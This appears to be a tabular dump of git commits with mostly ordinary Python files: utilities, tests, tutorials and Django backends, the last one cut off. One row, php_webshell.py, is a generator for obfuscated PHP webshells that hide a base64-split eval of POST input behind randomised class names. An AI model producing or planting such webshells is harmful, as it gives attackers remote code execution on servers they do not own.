commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13
values | lang stringclasses 23
values |
|---|---|---|---|---|---|---|---|---|
f4202292570eb51e52629ad09280175b42598d52 | Add Divider class | amaotone/murasame | murasame/divider.py | murasame/divider.py | import os
import pandas as pd
from . import CONFIG
conf = CONFIG["divider"]
class Divider(object):
def __init__(self, df, files, base):
self.data = df
self.files = files
self.base = base
self.writers = {}
def _setup_writer(self, outdir):
assert self.files
os.makedirs(outdir, exist_ok=True)
for name in self.files.keys():
path = os.path.join(outdir, name)
self.writers[name] = pd.ExcelWriter(path)
def save(self, outdir):
self._setup_writer(outdir)
for classname, member in self.data.groupby(self.base):
member = member.drop(self.base, axis=1)
for filename, classnames in self.files.items():
if classname in classnames:
target = self.writers[filename]
break
else:
raise RuntimeError
member.to_excel(target, classname, index=False)
for w in self.writers.values():
w.save()
def divider(df):
div = Divider(df, conf["files"], conf["base"])
div.save(conf["out"])
| mit | Python | |
7d987220474d76286c49b5378861854a09798a16 | create project folder | rkastilani/PowerOutagePredictor,rkastilani/PowerOutagePredictor,rkastilani/PowerOutagePredictor | PowerOutagePredictor/Tree/_init_.py | PowerOutagePredictor/Tree/_init_.py | mit | Python | ||
43d9582172cb268f9c2f38f3cd211bbca06b0741 | Create php_webshell.py | hillwah/webshell,360sec/webshell,360sec/webshell,tennc/webshell,hillwah/webshell,360sec/webshell,360sec/webshell,tennc/webshell,360sec/webshell,tennc/webshell,360sec/webshell,tennc/webshell,hillwah/webshell,tennc/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,hillwah/webshell,tennc/webshell,tennc/webshell,hillwah/webshell,hillwah/webshell,360sec/webshell,tennc/webshell,hillwah/webshell,hillwah/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,360sec/webshell | php/php_webshell.py | php/php_webshell.py | import random
#author: pureqh
#github: https://github.com/pureqh/webshell
shell = '''<?php
class {0}{3}
public ${1} = null;
public ${2} = null;
public ${6} = null;
function __construct(){3}
$this->{1} = 'ZXZhbCgkX1BPU';
$this->{6} = '1RbYV0pOw==';
$this->{2} = @base64_decode($this->{1}.$this->{6});
@eval({5}.$this->{2}.{5});
{4}{4}
new {0}();
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
parameter1 = random_name(5)
parameter2 = random_name(6)
lef = '''{'''
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
parameter3 = random_name(6)
shellc = shell.format(className,parameter1,parameter2,lef,rig,disrupt,parameter3)
return shellc
if __name__ == '__main__':
print (build_webshell())
| mit | Python | |
87b597fd5363ca14a8e491ba84bedb4486c6676b | Test __bytes__ special method | jongiddy/jute,jongiddy/jute | python3/jute/test/test_jute_bytes.py | python3/jute/test/test_jute_bytes.py | import unittest
from jute import Interface, Dynamic
class BytesLike(Interface):
def __iter__(self):
"""bytes-like object must be iterable."""
def __bytes__(self):
"""Return bytes representation."""
class BytesTestMixin:
def get_test_object(self):
return object()
def test_bytes(self):
bytes_like = self.get_test_object()
self.assertEqual(bytes(bytes_like), b'foo')
def test_getattr(self):
bytes_like = self.get_test_object()
self.assertEqual(getattr(bytes_like, '__bytes__')(), b'foo')
def test_attribute(self):
bytes_like = self.get_test_object()
self.assertEqual(bytes_like.__bytes__(), b'foo')
class FooBytes(BytesLike.Provider):
def __iter__(self):
return iter(b'foo')
def __bytes__(self):
return b'foo'
class BytesInstanceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return FooBytes()
class BytesInterfaceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return BytesLike(FooBytes())
class FooBytesProxy(Dynamic.Provider):
def provides_interface(self, interface):
return interface.implemented_by(BytesLike)
def __iter__(self):
return iter(b'foo')
def __bytes__(self):
return b'foo'
class BytesDynamicInstanceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return FooBytesProxy()
class BytesDynamicInterfaceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return BytesLike(FooBytesProxy())
# __bytes__ is never optimised away, so generated version works as is
class GeneratedBytes(BytesLike.Provider):
"""A class that generates the __bytes__ method dynamically."""
def __iter__(self):
return iter(b'foo')
def __getattr__(self, name):
if name == '__bytes__':
def f():
return b'foo'
return f
raise AttributeError(name)
class GeneratedBytesInstanceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return GeneratedBytes()
class GeneratedBytesInterfaceTests(BytesTestMixin, unittest.TestCase):
def get_test_object(self):
return BytesLike(GeneratedBytes())
| mit | Python | |
5e398ae0d8074a3caf11997884d9f719ef047b15 | Define exception for incorrect arguments | ueg1990/soccer-cli,architv/soccer-cli,Saturn/soccer-cli,thurask/soccer-cli,carlosvargas/soccer-cli | soccer/exceptions.py | soccer/exceptions.py | class IncorrectParametersException(Exception):
pass | mit | Python | |
d7020ccb328747922942c56872bcfbec47d451ae | Add cli command class for delete | bjoernricks/python-quilt,vadmium/python-quilt | quilt/cli/delete.py | quilt/cli/delete.py | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
from quilt.cli.meta import Command
from quilt.delete import Delete
class DeleteCommand(Command):
usage = "%prog delete [-r] [--backup] [patch|-n]"
name = "delete"
def add_args(self, parser):
parser.add_option("-r", help="Remove the deleted patch file from the " \
"patches directory as well.",
action="store_true", dest="remove", default=False)
parser.add_option("-n", help="Delete the next patch after topmost, " \
"rather than the specified or topmost " \
"patch.",
action="store_true", dest="next")
parser.add_option("--backup", help="Rename the patch file to patch~ " \
"rather than deleting it. Ignored if " \
"not used with `-r'.",
action="store_true", default=False, dest="backup")
def run(self, options, args):
delete = Delete(self.get_cwd(), self.get_pc_dir(),
self.get_patches_dir())
delete.deleted_patch.connect(self.deleted_patch)
delete.deleting_patch.connect(self.deleting_patch)
if options.next and len(args) > 0:
parser.print_usage()
sys.exit(1)
if options.next:
delete.delete_next(options.remove, options.remove)
else:
patch = None
if len(args) > 0:
patch = args[0]
delete.delete_patch(patch, options.remove, options.remove)
def deleted_patch(self, patch):
print "Removed patch %s" % patch.get_name()
def deleting_patch(self, patch, applied):
if applied:
print "Removing currently applied patch %s" % patch.get_name()
else:
print "Removing patch %s" % patch.get_name()
| mit | Python | |
8dfd59a639bcf540ea4c5a52e91c5f8a7a198554 | Initialize affineKeyTest | JoseALermaIII/python-tutorials,JoseALermaIII/python-tutorials | books/CrackingCodesWithPython/Chapter14/affineKeyTest.py | books/CrackingCodesWithPython/Chapter14/affineKeyTest.py | # This program proves that the keyspace of the affine cipher is limited
# to less than len(SYMBOLS) ^ 2.
import affineCipher, cryptomath
message = 'Make things as simple as possible, but not simpler.'
for keyA in range(2, 80):
key = keyA * len(affineCipher.SYMBOLS) + 1
if cryptomath.gcd(keyA, len(affineCipher.SYMBOLS)) == 1:
print(keyA, affineCipher.encryptMessage(key, message)) | mit | Python | |
77094bb723d35fd23d909e0c59b712eeb7612495 | Add fibonacci HW | bigfatpanda-training/pandas-practical-python-primer,bigfatpanda-training/pandas-practical-python-primer | training/level-1-the-zen-of-python/dragon-warrior/Fibonacci/stapp_Fibtest.py | training/level-1-the-zen-of-python/dragon-warrior/Fibonacci/stapp_Fibtest.py | """
Compute Fibonacci sequence and learn python.
Steve Tapp
"""
import sys
import timeit
fib_seq = [0, 1]
fib_even_sum = 0
for fibnum in range (2, 50):
fib_seq.append(fib_seq[-2] + fib_seq[-1])
print (fibnum, fib_seq[fibnum])
if fib_seq[-1] >= 4000000:
break
if not fib_seq[fibnum] % 2:
print ('even', fib_seq[fibnum])
fib_even_sum += fib_seq[fibnum]
print ('Sum of even fibonacci terms under 4 million is ', fib_even_sum)
| artistic-2.0 | Python | |
b1a851d6f5dd47790459564a55405627d9b7a9e4 | Add news date and title scrapper from ist's news page. | iluxonchik/python-general-repo | scripts/webscraping/ist_news_titles.py | scripts/webscraping/ist_news_titles.py | from urllib.request import urlopen
from bs4 import BeautifulSoup
import sys, io
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,'cp437','backslashreplace')
html = urlopen("http://tecnico.ulisboa.pt/pt/noticias/")
bsObj = BeautifulSoup(html, "html.parser")
for news_wrapper in bsObj.find("div", {"id":"content_wrapper"}).findAll("div", {"class":"news_wrapper"}):
news_grid = news_wrapper.find("div", {"class":"grid_9 omega"})
print("Date: " + news_grid.p.get_text())
print("Title: " + news_grid.h3.a.get_text()) | mit | Python | |
bd9496bf726aff0472a52d6c5e2a0db96f2af8e2 | Add allow_skipped_files option to DJANGO_DEFAULTS | martinogden/djangae,nealedj/djangae,armirusco/djangae,leekchan/djangae,jscissr/djangae,chargrizzle/djangae,chargrizzle/djangae,nealedj/djangae,martinogden/djangae,asendecka/djangae,asendecka/djangae,kirberich/djangae,wangjun/djangae,wangjun/djangae,stucox/djangae,stucox/djangae,pablorecio/djangae,trik/djangae,jscissr/djangae,martinogden/djangae,trik/djangae,SiPiggles/djangae,kirberich/djangae,armirusco/djangae,grzes/djangae,grzes/djangae,grzes/djangae,leekchan/djangae,pablorecio/djangae,leekchan/djangae,nealedj/djangae,wangjun/djangae,pablorecio/djangae,chargrizzle/djangae,trik/djangae,potatolondon/djangae,stucox/djangae,asendecka/djangae,potatolondon/djangae,jscissr/djangae,SiPiggles/djangae,armirusco/djangae,kirberich/djangae,b-cannon/my_djae,SiPiggles/djangae | djangae/core/management/__init__.py | djangae/core/management/__init__.py | import os
import sys
import argparse
import djangae.sandbox as sandbox
from djangae.utils import find_project_root
# Set some Django-y defaults
DJANGO_DEFAULTS = {
"storage_path": os.path.join(find_project_root(), ".storage"),
"port": 8000,
"admin_port": 8001,
"api_port": 8002,
"automatic_restart": "False",
"allow_skipped_files": "True",
}
def _execute_from_command_line(sandbox_name, argv, **sandbox_overrides):
with sandbox.activate(sandbox_name, add_sdk_to_path=True, **sandbox_overrides):
import django.core.management as django_management # Now on the path
return django_management.execute_from_command_line(argv)
def execute_from_command_line(argv=None, **sandbox_overrides):
"""Wraps Django's `execute_from_command_line` to initialize a djangae
sandbox before running a management command.
Note: The '--sandbox' arg must come first. All other args are forwarded to
Django as normal.
"""
argv = argv or sys.argv
parser = argparse.ArgumentParser(prog='manage.py')
parser.add_argument(
'--sandbox', default=sandbox.LOCAL, choices=sandbox.SANDBOXES.keys())
parser.add_argument('args', nargs=argparse.REMAINDER)
namespace = parser.parse_args(argv[1:])
overrides = DJANGO_DEFAULTS
overrides.update(sandbox_overrides)
return _execute_from_command_line(namespace.sandbox, ['manage.py'] + namespace.args, **overrides)
def remote_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the remote sandbox"""
return _execute_from_command_line(sandbox.REMOTE, argv or sys.argv, **sandbox_overrides)
def local_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the local sandbox"""
return _execute_from_command_line(sandbox.LOCAL, argv or sys.argv, **sandbox_overrides)
def test_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the test sandbox"""
return _execute_from_command_line(sandbox.TEST, argv or sys.argv, **sandbox_overrides)
| import os
import sys
import argparse
import djangae.sandbox as sandbox
from djangae.utils import find_project_root
# Set some Django-y defaults
DJANGO_DEFAULTS = {
"storage_path": os.path.join(find_project_root(), ".storage"),
"port": 8000,
"admin_port": 8001,
"api_port": 8002,
"automatic_restart": "False"
}
def _execute_from_command_line(sandbox_name, argv, **sandbox_overrides):
with sandbox.activate(sandbox_name, add_sdk_to_path=True, **sandbox_overrides):
import django.core.management as django_management # Now on the path
return django_management.execute_from_command_line(argv)
def execute_from_command_line(argv=None, **sandbox_overrides):
"""Wraps Django's `execute_from_command_line` to initialize a djangae
sandbox before running a management command.
Note: The '--sandbox' arg must come first. All other args are forwarded to
Django as normal.
"""
argv = argv or sys.argv
parser = argparse.ArgumentParser(prog='manage.py')
parser.add_argument(
'--sandbox', default=sandbox.LOCAL, choices=sandbox.SANDBOXES.keys())
parser.add_argument('args', nargs=argparse.REMAINDER)
namespace = parser.parse_args(argv[1:])
overrides = DJANGO_DEFAULTS
overrides.update(sandbox_overrides)
return _execute_from_command_line(namespace.sandbox, ['manage.py'] + namespace.args, **overrides)
def remote_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the remote sandbox"""
return _execute_from_command_line(sandbox.REMOTE, argv or sys.argv, **sandbox_overrides)
def local_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the local sandbox"""
return _execute_from_command_line(sandbox.LOCAL, argv or sys.argv, **sandbox_overrides)
def test_execute_from_command_line(argv=None, **sandbox_overrides):
"""Execute commands in the test sandbox"""
return _execute_from_command_line(sandbox.TEST, argv or sys.argv, **sandbox_overrides)
| bsd-3-clause | Python |
6317a43baed719bddd84863b750018a6ef1287b0 | add new test | sequana/sequana,sequana/sequana,sequana/sequana,sequana/sequana,sequana/sequana | test/test_canvas.py | test/test_canvas.py | import sequana.resources.canvas.bar as bar
def test_bar():
data = [
{"name":"A", "data":{"R1":10, "R2":90}},
{"name":"B", "data":{"R1":90, "R2":10}}]
bar.stacked_bar("title", "ACGT", datalist=data)
| bsd-3-clause | Python | |
2d9712f5b1fecb8a1f6c989ed835a9476b5cdab5 | Create MeshTextureCoordinates.py | stgeorges/pythonscripts | MeshTextureCoordinates.py | MeshTextureCoordinates.py | #***********************************************************************************************************#
#********* Get normalized 2-D texture coordinates of a mesh object *****************************************#
#********* by Djordje Spasic *******************************************************************************#
#********* issworld2000@yahoo.com 17-Feb-2015 **************************************************************#
"""
Rhino 5 SR11 (and all older releases) still does not have RhinoScript MeshTextureCoordinates function implemented for PythonScript.
MeshTextureCoordinates returns normalized (between 0 and 1) 2-D texture coordinates of a mesh object.
Small function bellow replicates this functionality.
"""
import rhinoscriptsyntax as rs
def MeshTextureCoordinates(object_id):
meshObj = rs.coercemesh(object_id)
mCoordL = []
for i in range(meshObj.TextureCoordinates.Count):
mCoordL.append(meshObj.TextureCoordinates[i])
return mCoordL
meshId = rs.GetObject("pick up your mesh", 32)
coord = MeshTextureCoordinates(meshId)
print coord
| unlicense | Python | |
ed56dc3fc8411baa5d2948591e9e24fc31b7444d | Add files via upload | josedolz/LiviaNET | src/processLabels.py | src/processLabels.py | """
Copyright (c) 2016, Jose Dolz .All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
Jose Dolz. Dec, 2016.
email: jose.dolz.upv@gmail.com
LIVIA Department, ETS, Montreal.
"""
import sys
import pdb
from os.path import isfile, join
import os
import numpy as np
import nibabel as nib
import scipy.io as sio
from LiviaNet.Modules.IO.loadData import load_nii
from LiviaNet.Modules.IO.loadData import load_matlab
from LiviaNet.Modules.IO.saveData import saveImageAsNifti
from LiviaNet.Modules.IO.saveData import saveImageAsMatlab
# NOTE: Only has been tried on nifti images. However, it should not give any error for Matlab images.
""" To print function usage """
def printUsage(error_type):
if error_type == 1:
print(" ** ERROR!!: Few parameters used.")
else:
print(" ** ERROR!!: ...") # TODO
print(" ******** USAGE ******** ")
print(" --- argv 1: Folder containing label images")
print(" --- argv 2: Folder to save corrected label images")
print(" --- argv 3: Number of expected classes (including background)")
print(" --- argv 4: Image type")
print(" ------------- 0: nifti format")
print(" ------------- 1: matlab format")
def getImageImageList(imagesFolder):
if os.path.exists(imagesFolder):
imageNames = [f for f in os.listdir(imagesFolder) if isfile(join(imagesFolder, f))]
imageNames.sort()
return imageNames
def checkAnotatedLabels(argv):
# Number of input arguments
# 1: Folder containing label images
# 2: Folder to save corrected label images
# 3: Number of expected classes (including background)
# 4: Image type
# 0: nifti format
# 1: matlab format
# Do some sanity checks
if len(argv) < 4:
printUsage(1)
sys.exit()
imagesFolder = argv[0]
imagesFolderdst = argv[1]
numClasses = int(argv[2])
imageType = int(argv[3])
imageNames = getImageImageList(imagesFolder)
printFileNames = False
for i_d in xrange(0, len(imageNames)) :
if imageType == 0:
imageFileName = imagesFolder + '/' + imageNames[i_d]
[imageData,img_proxy] = load_nii(imageFileName, printFileNames)
else:
imageData = load_matlab(imageFileName, printFileNames)
labelsOrig = np.unique(imageData)
if (len(labelsOrig) != numClasses):
print(" WARNING!!!!! Number of expected clases ({}) is different to found labels ({}) ".format(numClasses,len(labelsOrig)))
# Correct labels
labelCorrectedImage = np.zeros(imageData.shape)
for i_l in xrange(0,len(labelsOrig)):
idx = np.where(imageData == labelsOrig[i_l])
labelCorrectedImage[idx] = i_l
print(" ... Saving labels...")
nameToSave = imagesFolderdst + '/' + imageNames[i_d]
if imageType == 0: # nifti
imageTypeToSave = np.dtype(np.int8)
saveImageAsNifti(labelCorrectedImage,
nameToSave,
imageFileName,
imageTypeToSave)
else: # Matlab
# Cast to int8 for saving purposes
saveImageAsMatlab(labelCorrectedImage.astype('int8'),nameToSave)
print " ****************************************** PROCESSING LABELS DONE ******************************************"
if __name__ == '__main__':
checkAnotatedLabels(sys.argv[1:])
| mit | Python | |
0301a96b8c9592c58fe41eded24a39d503f4fcb2 | Create ExtendedJsonRpcApi.py | hal0x2328/neo-python,hal0x2328/neo-python | neo/api/JSONRPC/ExtendedJsonRpcApi.py | neo/api/JSONRPC/ExtendedJsonRpcApi.py | from neo.Core.Blockchain import Blockchain
from neo.api.JSONRPC.JsonRpcApi import JsonRpcApi, JsonRpcError
from neo.Implementations.Wallets.peewee.UserWallet import UserWallet
from neocore.UInt256 import UInt256
import datetime
class ExtendedJsonRpcApi:
"""
Extended JSON-RPC API Methods
"""
def get_node_state(self):
height = Blockchain.Default().Height
headers = Blockchain.Default().HeaderHeight
diff = height - JsonRpcApi.start_height
now = datetime.datetime.utcnow()
difftime = now - JsonRpcApi.start_dt
mins = difftime / datetime.timedelta(minutes=1)
secs = mins * 60
bpm = 0
tps = 0
if diff > 0 and mins > 0:
bpm = diff / mins
tps = Blockchain.Default().TXProcessed / secs
return {
'Progress': [height, "/", headers],
'Block-cache length': Blockchain.Default().BlockCacheCount,
'Blocks since program start': diff,
'Time elapsed (minutes)': mins,
'Blocks per min': bpm,
'TPS': tps
}
def get_tx_history(self):
if JsonRpcApi.wallet:
res = []
for tx in JsonRpcApi.wallet.GetTransactions():
json = tx.ToJson()
tx_id = UInt256.ParseString(json['txid'])
txx, height = Blockchain.Default().GetTransaction(tx_id)
header = Blockchain.Default().GetHeaderByHeight(height)
block_index = header.Index
json['block_index'] = block_index
block_timestamp = header.Timestamp
json['blocktime'] = block_timestamp
res.append(json)
return res
else:
raise JsonRpcError(-400, "Access denied.")
| mit | Python | |
04e7a43c9516fc9834727c3087863c6282da2dbf | Add tests.py to app skeleton. | rapidsms/rapidsms-legacy,rapidsms/rapidsms-legacy,rapidsms/rapidsms-legacy | lib/rapidsms/skeleton/app/tests.py | lib/rapidsms/skeleton/app/tests.py | from rapidsms.tests.scripted import TestScript
from app import App
class TestApp (TestScript):
apps = (App,)
# define your test scripts here.
# e.g.:
#
# testRegister = """
# 8005551212 > register as someuser
# 8005551212 < Registered new user 'someuser' for 8005551212!
# 8005551212 > tell anotheruser what's up??
# 8005550000 < someuser said "what's up??"
# """
#
# You can also do normal unittest.TestCase methods:
#
# def testMyModel (self):
# self.assertEquals(...)
| bsd-3-clause | Python | |
d358bf3f103069c2f5a85da15331f808df746064 | Bump version | walkr/oi,danbob123/oi | oi/version.py | oi/version.py | VERSION = '0.3.0'
| VERSION = '0.2.1'
| mit | Python |
19beca7e8166cbab42937ccbd8e9c705ca4913dd | Bump version | danbob123/oi,walkr/oi | oi/version.py | oi/version.py | VERSION = '0.1.0'
| VERSION = '0.0.1'
| mit | Python |
6f2a9cbf9e571855074e898d22480d61277a3eda | Add experimental polling DB backend. | thread/django-lightweight-queue,thread/django-lightweight-queue,lamby/django-lightweight-queue,prophile/django-lightweight-queue,prophile/django-lightweight-queue | django_lightweight_queue/backends/db.py | django_lightweight_queue/backends/db.py | import time
import datetime
from django.db import connection, models, ProgrammingError
from ..job import Job
class DatabaseBackend(object):
TABLE = 'django_lightweight_queue'
FIELDS = (
models.AutoField(name='id', primary_key=True),
models.CharField(name='queue', max_length=255),
models.TextField(name='data'),
models.DateTimeField(name='created'),
)
def __init__(self):
qn = connection.ops.quote_name
sql = []
for x in self.FIELDS:
sql.append(' '.join((
qn(x.name),
x.db_type(connection=connection),
'PRIMARY KEY' if x.primary_key else '',
)))
cursor = connection.cursor()
cursor.execute('CREATE TABLE IF NOT EXISTS %s (\n%s\n);' % (
qn(self.TABLE),
',\n'.join(sql),
))
try:
cursor.execute('CREATE INDEX %s ON %s (%s, %s)' % (
qn('%s_idx' % self.TABLE),
qn(self.TABLE),
qn('queue'),
qn('created'),
))
except ProgrammingError:
# "IF NOT EXISTS" is not portable, so we just fail to create it
pass
# Don't share connections across fork()
connection.close()
def enqueue(self, job, queue):
cursor = connection.cursor()
cursor.execute("""
INSERT INTO %s (queue, data, created) VALUES (%%s, %%s, %%s)
""" % connection.ops.quote_name(self.TABLE), (
queue,
job.to_json(),
datetime.datetime.utcnow(),
))
def dequeue(self, queue, timeout):
cursor = connection.cursor()
cursor.execute("""
SELECT id, data FROM %s WHERE queue = %%s
ORDER BY created ASC LIMIT 1
""" % connection.ops.quote_name(self.TABLE), (queue,))
try:
id_, data = cursor.fetchall()[0]
except (IndexError, ProgrammingError):
time.sleep(timeout)
return
cursor.execute("""
DELETE FROM %s WHERE id = %%s
""" % connection.ops.quote_name(self.TABLE), (id_,))
try:
return Job.from_json(data)
except TypeError:
pass
| bsd-3-clause | Python | |
2498e40294cf56f40fb869d30844c3a8223267a0 | Create initdb command | okfn/hashtag-listener,okfn/hashtag-listener | initdb.py | initdb.py | #!/usr/bin/env python
from app import db
db.create_all()
| mit | Python | |
3c8eb0563f3997fc068d039b18452eaa98da3122 | Add a script useful for downloading large avatar images from Atom feeds | squirrel2038/thearchdruidreport-archive,squirrel2038/thearchdruidreport-archive,squirrel2038/thearchdruidreport-archive | download_avatars.py | download_avatars.py | #!/usr/bin/env python3
import PIL.Image
import io
import json
import requests
import post_list
import web_cache
# Split this file into two modules, because we need to move web_cache out of
# the way between the two steps. (We want to isolate the avatar HTTP requests)
# into its own thing.
def _make_avatar_url_list():
seen = set()
with open("avatar_urls", "wt") as fp:
for post in post_list.load_posts():
url = "https://thearchdruidreport.blogspot.com/feeds/%s/comments/default" \
"?alt=json&v=2&orderby=published&reverse=false&max-results=1000" % post.postid
js = json.loads(web_cache.get(url).decode("utf8"))
for comment in js["feed"]["entry"]:
(author,) = comment["author"]
avatar = author["gd$image"]
int(avatar["width"])
int(avatar["height"])
src = avatar["src"]
if src not in seen:
seen.add(src)
assert "\n" not in src
fp.write(src + "\n")
def _fetch_avatar_urls():
urls = open("avatar_urls", "r").read().splitlines()
for i, url in enumerate(urls):
print("[%d/%d] fetching %s ..." % (i + 1, len(urls), url))
try:
img = PIL.Image.open(io.BytesIO(web_cache.get(url)))
except:
print("WARNING: Bad avatar URL: %s" % url)
#_make_avatar_url_list()
_fetch_avatar_urls()
| mit | Python | |
7e1ea3516aa6b4d41748a9ae63464a32ff16e018 | Test variable module | raviqqe/tensorflow-extenteten,raviqqe/tensorflow-extenteten | extenteten/variable_test.py | extenteten/variable_test.py | from .util import static_shape, static_rank
from .variable import variable
def test_variable():
shape = [123, 456]
assert static_shape(variable(shape)) == shape
initial = [float(n) for n in shape]
assert static_rank(variable(initial)) == 1
| unlicense | Python | |
1d5d76f0166619f3004adb02a902b0739dc55bd6 | Create balanceamento.py | jeffmorais/estrutura-de-dados | balanceamento.py | balanceamento.py | import unittest
class Pilha():
def __init__(self):
self._lista = []
def vazia(self):
return not bool(self._lista)
def topo(self):
if self._lista:
return self._lista[-1]
raise PilhaVaziaErro()
def empilhar(self, valor):
self._lista.append(valor)
def desempilhar(self):
try:
return self._lista.pop()
except IndexError:
raise PilhaVaziaErro()
class PilhaVaziaErro(Exception):
pass
def bora(cont, teste, pilha):
n = teste[cont]
if n in '{[(':
pilha.empilhar(n)
if n in '}])':
if n == '}' and pilha.desempilhar() != '{':
return False
if n == ']' and pilha.desempilhar() != '[':
return False
if n == ')' and pilha.desempilhar() != '(':
return False
cont = cont + 1
if len(teste) == cont:
if pilha.vazia():
return True
return False
return bora(cont, teste, pilha)
def esta_balanceada(teste):
"""
Função que calcula se expressão possui parenteses, colchetes e chaves balanceados
O Aluno deverá informar a complexidade de tempo e espaço da função
Deverá ser usada como estrutura de dados apenas a pilha feita na aula anterior
:param expressao: string com expressao a ser balanceada
:return: boleano verdadeiro se expressao está balanceada e falso caso contrário
"""
pass
if teste:
pilha = Pilha()
cont = 0
if teste[0] in '}])':
return False
return bora(cont, teste, pilha)
else:
return True
class BalancearTestes(unittest.TestCase):
def test_expressao_vazia(self):
self.assertTrue(esta_balanceada(''))
def test_parenteses(self):
self.assertTrue(esta_balanceada('()'))
def test_chaves(self):
self.assertTrue(esta_balanceada('{}'))
def test_colchetes(self):
self.assertTrue(esta_balanceada('[]'))
def test_todos_caracteres(self):
self.assertTrue(esta_balanceada('({[]})'))
self.assertTrue(esta_balanceada('[({})]'))
self.assertTrue(esta_balanceada('{[()]}'))
def test_chave_nao_fechada(self):
self.assertFalse(esta_balanceada('{'))
def test_colchete_nao_fechado(self):
self.assertFalse(esta_balanceada('['))
def test_parentese_nao_fechado(self):
self.assertFalse(esta_balanceada('('))
def test_chave_nao_aberta(self):
self.assertFalse(esta_balanceada('}{'))
def test_colchete_nao_aberto(self):
self.assertFalse(esta_balanceada(']['))
def test_parentese_nao_aberto(self):
self.assertFalse(esta_balanceada(')('))
def test_falta_de_caracter_de_fechamento(self):
self.assertFalse(esta_balanceada('({[]}'))
def test_falta_de_caracter_de_abertura(self):
self.assertFalse(esta_balanceada('({]})'))
def test_expressao_matematica_valida(self):
self.assertTrue(esta_balanceada('({[1+3]*5}/7)+9'))
def test_char_errado_fechando(self):
self.assertFalse(esta_balanceada('[)'))
if __name__ == '__main__':
unittest.main()
| mit | Python | |
58f85213c72b194fe44da36972436c4e7bbdd681 | add sina http util | AsherYang/ThreeLine,AsherYang/ThreeLine,AsherYang/ThreeLine | server/crawler/sinawb/SinaHttpUtil.py | server/crawler/sinawb/SinaHttpUtil.py | # -*- coding:utf-8 -*-
"""
Author: AsherYang
Email : ouyangfan1991@gmail.com
Date : 2017/11/22
Desc : Sina Http Util 参考 Shserver 微店 OpenRequest.py
"""
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import gzip, json, urllib, urllib2, collections,time,logging
def http_get(url,params={},header={}):
httpUrl=url
if params is not None and len(params)>0:
httpUrl=url+"?"+_encode_params(**params)
httpUrl=httpUrl.replace(': ',':')
httpUrl=httpUrl.replace(', ',',')
httpUrl=httpUrl.replace("'",'"')
print httpUrl
req=urllib2.Request(httpUrl,None,headers=header)
res=urllib2.urlopen(req)
body=_read_body(res)
# check_status(body)
return body
def http_post(url,params={},header={}):
req=urllib2.Request(url)
for k,v in header:
req.add_header(k,v)
res=urllib2.urlopen(req,data=params,header=header)
body=_read_body(res)
# check_status(body)
return body
# def check_status(resJson,statusName="status",code="status_code",reason="status_reason"):
# if(resJson is None ):
# raise OpenError("10001","系统错误,返回的结果为空",None)
# res_dic=json.loads(resJson)
# if(res_dic.get(statusName) is None):
# raise OpenError("10001","系统错误,状态码为空",None)
# status_code=res_dic.get(statusName).get(code)
# status_reason=res_dic.get(statusName).get(reason)
# if(0!=status_code and "0"!=status_code):
# raise OpenError(status_code,status_reason,None)
def _encode_params(**kw):
params = []
for k, v in kw.iteritems():
if isinstance(v, basestring):
qv = v.encode('utf-8') if isinstance(v, unicode) else v
params.append('%s=%s' % (k, urllib.quote(qv)))
elif isinstance(v, collections.Iterable):
for i in v:
qv = i.encode('utf-8') if isinstance(i, unicode) else str(i)
params.append('%s=%s' % (k, urllib.quote(qv)))
else:
qv = str(v)
params.append('%s=%s' % (k, urllib.quote(qv)))
return '&'.join(params)
def _read_body(res):
using_gzip = res.headers.get('Content-Encoding', '')=='gzip'
body = res.read()
